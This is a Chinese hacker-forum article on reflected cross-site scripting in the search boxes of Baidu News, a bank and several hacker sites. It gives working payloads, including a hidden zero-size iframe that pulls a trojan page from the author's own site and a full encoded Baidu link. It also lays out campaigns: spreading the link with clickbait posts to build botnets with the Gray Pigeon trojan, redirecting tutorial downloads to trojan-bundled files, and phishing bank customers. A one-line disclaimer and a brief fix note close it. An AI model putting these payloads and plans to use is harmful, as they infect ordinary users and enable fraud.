再暴各大站点搜索引擎漏洞

文章作者：丹丹
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

起：转载请勿删除以下信息！
精诚科技 www.cnsapc.com
BY:丹丹 netciw@yahoo.com.cn 博客：http://ciwnet.blog.sohu.com

红狼安全小组[C.R.S.T]首发，希望大家多支持 www.wolfexp.net

附件里有技术文档下载！！

前言
前几日，无意中发现百度有个跨站漏洞，在自己的博客里贴了张截图。那里知道来了几个朋友说这个是雕虫小技！实在是让在下汗颜。彪悍的人身不需要解释，看来必须用事实去说话！（小弟我的博 ciwnet@yahoo.com.cn）
案例
首先按照惯例我们要来看下百度的跨站漏洞，首页上是不存在跨站漏洞。但是在新闻搜索里却出现了跨站漏洞！http://news.baidu.com 我在地址栏目里输入<script>alert("丹丹www.cnsapc.com")</script>出现如图（一）


我们继续向下看，交通银行也存在此类的跨站漏洞。直接在首页输入<script>alert("丹丹www.cnsapc.com")</script>，出现如图（2）

我们再看看一个黑客站点吧！就拿黑客基地做做文章，我们直接在他的主页搜索文章里搜索关键字<script>alert("丹丹www.cnsapc.com")</script>一样和上面两个例子一样出现如图（3）


其实不仅仅是这几个站点，天极，yahoo，华军软件，黑客防线，黑客X小组，网侠。。。。。。都有诸如上面我谈到的跨站漏洞！
利用
说到利用，我们实在很难用到跨站经常使用的盗取Cookies，添加某种上传程序后缀，或者对于进一步入侵有利的手法！ 但在上一期黑客X档案里冰河洗剑里利用网页快照挂马的思路不仅让我倒吸



一口冷气！也让我想到利用这些大站来挂我们的木马！

首先制作个木马，按照惯例首先我们配置个灰鸽子！免杀，挂马不在我们今天讨论范围，一切准备好，我上传到我的站里，其挂马页地址为:www.cnsapc.com/index.html 。那么现在利用百度实现我们挂马思路！在news。baidu.com里输入
<iframe name="I1" src="http://www.cnsapc.com/index.html" width ="0" height="0"> </iframe>这里为了方便大家看到效果，我在演示的时候把width和height都设置为200，如图（4）

大家试想下，如果我们跑到中国各大门户论坛发帖，只要你题目够劲爆，比如：“转自百度新闻的芙蓉姐姐日本低俗举动”“百度是这样发家的！——转自百度新闻网”然后我们把连接地址http://news.baidu.com/ns?word=%3Ciframe+name%3D%22I1%22+src%3D%22http%3A%2F%2Fwww.cnsapc.com%2Findex.html%22+width+%3D%220%22+height%3D%220%22%3E+%3C%2Fiframe%3E&tn=news&from=news&ie=gb2312&bs=%3Cscript%3Ealert%28%22%A6%CC%A1%E8%A6%CC%A1%E8www.cnsapc.com%22%29%3C%2Fscript%3E&sr=0&cl=2&rn=20&ct=0贴上去就好了！那么当他们打开百度的时候，已经在不知不觉中成为各位看观的肉鸡了！只要你马成活率高，就请担心下你的机器配置是否可以抵御万台肉鸡的潮水般上线！
下面我们来看看如何利用黑客站点来挂马，很多人上黑客站点，很大一部分是为了学会刷点QB，搞点免费的VIP教程。我们就利用这样的弱点，达到欺骗的目的！先给几个教程捆绑上木马！再到各个黑客站点发布资源里发布消息，“黑客基地最新下载地址，欲下从速！”然后把捆有木马教程的地址发布上去！ 实际上当你下载下的教程并不是从黑客基地而来！只是我通过转向代码
<script language=vbscript>
window.location.href=”http://www.cnsapc.com/Soft/ShowSoftDown.asp?UrlID=1&SoftID=106”
</script>
把你欺骗到www.cnsapc.com捆有木马的下载地址里！那么实际上你会以为是从黑客基地里下载下来的！(只是这样说，小弟从来没个任何东西捆过木马，最鄙视给教程捆绑！)
讲完了黑客类站点的跨站挂马，我们来讲讲银行站点的跨站安全银行吧，我们在上面已经说过了交行跨站漏洞！那么时候我只需要注册个类似交行的域名进行钓鱼，再在各大商务站点发布超低价格的物品！欺骗他们进入我的网店，在网店以图片形式产生连接指向我们精心构造URL用来钓鱼的域名上，（这里和传统的钓鱼不一样的是，首先打开的是真实的银行地址，再转向我们的假域名上）后果是什么我们可想而知！[丹丹提示：只做技术思考，切务利用到犯罪中！]
总结：不知道是各大站点没有发现这样的问题，还是认为这样的漏洞对自身没有任何伤害，所以就没有去重视！那么受害的还是广大的网友！想起前辈的一句话：“网络不安全啊！”真是如此！其实这样的漏洞修补其实也很简单。过滤掉“<”同时限制搜索字符长度就基本可以防御这样的跨站漏洞了！
附录：大家可以对参考红狼安全小组原闯文章《URL欺骗初探》作者：fhod
地址 ：http://www.wolfexp.net/forum/read.php?tid=2412
以及红狼安全小组原创文章《搜索引擎：我也能XSS》作者：lizaib
地址：http://www.wolfexp.net/forum/read.php?tid=2358
进行结合学习！当然我在我博客里已经收录了一些XSS攻击代码！
地址：http://ciwnet.blog.sohu.com/14835682.html同时还有其他的跨站利用的思路，这里由于本人时间关系没有再写下去，希望大家积极讨论！URL我们可以加密，减少等等！这样更方便我们欺骗！